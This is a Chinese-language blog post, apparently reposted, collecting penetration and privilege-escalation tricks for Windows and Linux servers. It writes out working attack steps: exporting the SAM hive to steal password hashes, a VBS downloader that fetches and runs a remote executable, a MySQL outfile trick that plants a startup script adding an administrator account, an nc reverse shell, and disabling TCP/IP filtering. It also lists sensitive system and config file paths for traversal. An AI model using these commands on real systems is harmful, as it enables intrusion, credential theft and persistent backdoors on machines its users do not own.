各种渗透,提权的经验和技巧总结(下)
收集系统信息的脚本:for window:
@echo off echo #######at- with atq##### echo #!/bin/bash echo #######geting sysinfo#### echo #####about network### echo ######service#### for i in {oracle,mysql,tomcat,samba,apache,ftp} locate passwd >/tmp/password 2>/dev/null ###maybe can use "tree /"### |
ethash 不免杀怎么获取本机 hash:首先导出注册表:
Windows 2000:regedit /e d:\aa.reg "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users" Windows 2003:reg export "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users" d:\aa.reg 注意权限问题,一般注册表默认sam目录是不能访问的。需要设置为完全控制以后才可以访问(界面登录的需要注意,system权限可以忽略)。 接下来就简单了,把导出的注册表,down 到本机,修改注册表头导入本机,然后用抓去hash的工具抓本地用户就OK了 当 GetHashes 获取不到 hash 时,可以用冰刃把 sam 复制到桌面。据我所知,某人是用这个方法虚拟机多次因为不知道密码而进不去!~ |
vbs 下载者:1: echo Set sGet = createObject("ADODB.Stream") >>c:\windows\cftmon.vbs echo sGet.Mode = 3 >>c:\windows\cftmon.vbs echo sGet.Type = 1 >>c:\windows\cftmon.vbs echo sGet.Open() >>c:\windows\cftmon.vbs echo sGet.Write(xPost.responseBody) >>c:\windows\cftmon.vbs echo sGet.SaveToFile "c:\windows\e.exe",2 >>c:\windows\cftmon.vbs echo Set objShell = CreateObject("Wscript.Shell") >>c:\windows\cftmon.vbs echo objshell.run """c:\windows\e.exe""" >>c:\windows\cftmon.vbs cftmon.vbs 2: cscript c:\down.vbs http://xxxx/mm.exe c:\mm.exe |
create table a (cmd text):insert into a values ("set wshshell=createobject (""wscript.shell"")"); insert into a values ("a=wshshell.run (""cmd.exe /c net user admin admin /add"",0)"); insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators admin /add"",0)"); select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs"; |
Cmd 下目录的操作技巧:列出d的所有目录: for /d %i in (d:\freehost\*) do @echo %i 把当前路径下文件夹的名字只有1-3个字母的显示出来: 以当前目录为搜索路径,把当前目录与下面的子目录的全部EXE文件列出: 以指定目录为搜索路径,把当前目录与下面的子目录的所有文件列出: 这个会显示a.txt里面的内容,因为/f的作用,会读出a.txt中: delims=后的空格是分隔符,tokens是取第几个位置: |
Linux 系统下的一些常见路径:/etc/passwd /etc/shadow /etc/fstab /etc/host.conf /etc/motd /etc/ld.so.conf /var/www/htdocs/index.php /var/www/conf/httpd.conf /var/www/htdocs/index.html /var/httpd/conf/php.ini /var/httpd/htdocs/index.php /var/httpd/conf/httpd.conf /var/httpd/htdocs/index.html /var/httpd/conf/php.ini /var/www/index.html /var/www/index.php /opt/www/conf/httpd.conf /opt/www/htdocs/index.php /opt/www/htdocs/index.html /usr/local/apache/htdocs/index.html /usr/local/apache/htdocs/index.php /usr/local/apache2/htdocs/index.html |
Windows 系统下的一些常见路径(可以将c盘换成d,e盘,比如星外虚拟主机跟华众得,一般都放在d盘):c:\windows\php.ini c:\boot.ini c:\1.txt c:\a.txt c:\CMailServer\config.ini c:\hzhost\databases\url.asp c:\hzhost\hzclient.exe C:\Documents and Settings\All Users\「开始」菜单\程序\Serv-U\Serv-U Administrator.lnk |
各种网站的配置文件相对路径大全:/config.php ../../config.php ../config.php ../../../config.php /config.inc.php ./config.inc.php ../../config.inc.php ../config.inc.php ../../../config.inc.php /conn.php ./conn.php ../../conn.php ../conn.php ../../../conn.php /conn.asp ./conn.asp ../../conn.asp ../conn.asp ../../../conn.asp /config.inc.php ../inc/conn.asp ../../../inc/conn.asp /inc/config.inc.php ./inc/config.inc.php ../../inc/config.inc.php ../inc/config.inc.php ../../../inc/config.inc.php /index.php ./index.php ../../index.php ../index.php ../../../index.php /index.asp ./index.asp ../../index.asp ../index.asp ../../../index.asp |
去除TCP IP筛选:TCP/IP筛选在注册表里有三处,分别是:
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip 分别用以下命令来导出注册表项: 然后再把三个文件里的: “EnableSecurityFilters"=dword:00000001” 改为: “EnableSecurityFilters"=dword:00000000” 再将以上三个文件分别用以下命令导入注册表即可: |
Webshell 提权小技巧:Cmd路径:c:\windows\temp\cmd.exe
Nc 也在同目录下,例如反弹cmdshell: "c:\windows\temp\nc.exe -vv ip 999 -e c:\windows\temp\cmd.exe" 通常都不会成功。 而直接在 cmd 路径上输入:c:\windows\temp\nc.exe 命令输入:-vv ip 999 -e c:\windows\temp\cmd.exe 却能成功。。这个不是重点 |
命令行调用 RAR 打包:rar a -k -r -s -m3 c:\1.rar c:\folder |
转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/1518.html